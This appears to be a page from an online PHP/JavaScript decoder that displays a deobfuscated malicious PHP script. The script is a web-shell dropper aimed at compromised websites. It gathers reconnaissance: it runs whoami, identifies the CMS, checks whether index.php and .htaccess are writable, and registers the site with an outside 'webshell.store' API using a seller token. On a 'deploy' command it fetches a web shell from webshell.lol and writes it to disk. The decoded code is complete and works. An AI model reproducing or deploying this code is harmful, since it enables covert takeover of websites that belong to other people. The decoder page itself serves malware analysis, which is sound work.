Online PHP and Javascript Decoder decode hidden script to uncover its real functionality



error_reporting(0);
header('Content-Type: application/json');

$API_URL = "https://api.webshell.store/functions/v1/seller-verify";
$TOKEN = "seller_llycvolkcrbjoddsj7db0m";
$CURRENT_DOMAIN = $_SERVER['HTTP_HOST'];
$CMD = $_GET['cmd'] ?? 'default';
$SCRIPT_PATH = $_SERVER['SCRIPT_NAME'];

function detectCMS() {
    if (file_exists('wp-login.php') || file_exists('wp-config.php')) {
        $version = null;
        if (file_exists('readme.html')) {
            $readme = @file_get_contents('readme.html');
            if (preg_match('/Version\s+([0-9.]+)/i', $readme, $match)) {
                $version = $match[1];
            }
        }
        return ['type' => 'WordPress', 'version' => $version];
    } elseif (file_exists('administrator/index.php')) {
        return ['type' => 'Joomla', 'version' => null];
    } elseif (file_exists('core/misc/drupal.js')) {
        return ['type' => 'Drupal', 'version' => null];
    } elseif (file_exists('skin/frontend/')) {
        return ['type' => 'Magento', 'version' => null];
    } elseif (file_exists('admin-dev/')) {
        return ['type' => 'PrestaShop', 'version' => null];
    }
    return ['type' => null, 'version' => null];
}

$whoami = trim(@shell_exec('whoami') ?: 'N/A');

// Function to check if file has write permissions
function hasWritePerms($filepath) {
    if (!file_exists($filepath)) {
        return false;
    }
    $perms = @fileperms($filepath);
    if ($perms === false) {
        return false;
    }
    // Check owner write (0200), group write (0020), or other write (0002)
    return (bool)($perms & 0222);
}

// Check if specific files are writable
$can_edit_index = false;
if (file_exists('index.php')) {
    $can_edit_index = hasWritePerms('index.php');
} elseif (file_exists('index.html')) {
    $can_edit_index = hasWritePerms('index.html');
}

$can_edit_htaccess = false;
if (file_exists('.htaccess')) {
    $can_edit_htaccess = hasWritePerms('.htaccess');
}

$can_create_files = hasWritePerms();
$cms = detectCMS();

if ($CMD === 'default') {
    $response = [
        'domain' => $CURRENT_DOMAIN,
        'whoami' => $whoami,
        'can_edit_index' => $can_edit_index,
        'can_create_files' => $can_create_files,
        'can_edit_htaccess' => $can_edit_htaccess,
        'cms_type' => $cms['type'],
        'cms_version' => $cms['version'],
        'verification_filename' => $SCRIPT_PATH,
        'document_root' => isset($_SERVER['DOCUMENT_ROOT']) ? $_SERVER['DOCUMENT_ROOT'] : 'N/A'
    ];

    $data = [
        'action' => 'register',
        'token' => $TOKEN,
        'domain' => $CURRENT_DOMAIN,
        'verification_data' => $response
    ];

    $ch = curl_init($API_URL);
    curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
    curl_setopt($ch, CURLOPT_POST, true);
    curl_setopt($ch, CURLOPT_POSTFIELDS, json_encode($data));
    curl_setopt($ch, CURLOPT_HTTPHEADER, ['Content-Type: application/json']);
    curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, true);
    curl_setopt($ch, CURLOPT_TIMEOUT, 30);

    $api_response = curl_exec($ch);
    $curl_error = curl_error($ch);
    $http_code = curl_getinfo($ch, CURLINFO_HTTP_CODE);
    curl_close($ch);

    if ($curl_error) {
        $response['registered'] = false;
        $response['message'] = 'Connection error: ' . $curl_error;
        $response['debug'] = ['api_url' => $API_URL, 'curl_error' => $curl_error];
    } elseif ($http_code !== 200) {
        $response['registered'] = false;
        $response['message'] = 'API error (HTTP ' . $http_code . ')';
        $response['debug'] = ['http_code' => $http_code, 'response' => substr($api_response, 0, 500)];
    } else {
        $result = json_decode($api_response, true);

        if (json_last_error() !== JSON_ERROR_NONE) {
            $response['registered'] = false;
            $response['message'] = 'Invalid API response: ' . json_last_error_msg();
            $response['debug'] = ['response' => substr($api_response, 0, 500)];
        } else {
            $response['registered'] = $result['success'] ?? false;
            $response['message'] = $result['success'] ? 'Domain registered' : ($result['error'] ?? 'Registration failed');

            if (!$result['success'] && isset($result['error'])) {
                $response['debug'] = ['error_detail' => $result['error']];
            }
        }
    }

    echo json_encode($response, JSON_PRETTY_PRINT);
} elseif ($CMD === 'deploy') {
    $webshell_url = 'https://webshell.lol/x.txt';
    $webshell_content = @file_get_contents($webshell_url);

    if ($webshell_content) {
        $random = substr(md5(time() . rand()), 0, 8);
        $webshell_filename = "store_" . $random . ".php";

        if (@file_put_contents($webshell_filename, $webshell_content)) {
            echo json_encode([
                'success' => true,
                'filename' => $webshell_filename,
                'message' => 'Webshell deployed successfully'
            ], JSON_PRETTY_PRINT);
        } else {
            echo json_encode([
                'success' => false,
                'error' => 'Failed to save webshell file'
            ], JSON_PRETTY_PRINT);
        }
    } else {
        echo json_encode([
            'success' => false,
            'error' => 'Failed to download webshell'
        ], JSON_PRETTY_PRINT);
    }
} else {
    echo json_encode([
        'error' => 'Invalid command',
        'available_commands' => ['default', 'deploy']
    ], JSON_PRETTY_PRINT);
}


© 2023 Quttera Ltd. All rights reserved.